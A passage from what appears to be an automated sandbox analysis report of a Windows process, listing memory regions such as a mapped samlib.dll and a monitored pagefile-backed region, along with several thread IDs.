end_va = 0x7ff85c6abfff
monitored = 0
entry_point = 0x7ff85c6937a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 2699
start_va = 0x690000
end_va = 0x6bdfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000690000"
filename = ""
Thread:
id = 221
os_tid = 0x678
Thread:
id = 222
os_tid = 0x674
Thread:
id = 223
os_tid = 0x670
Thread:
id = 224
os_tid = 0x650
Thread:
id = 225
os_tid = 0x64c
Thread:
id = 226
os_tid = 0x644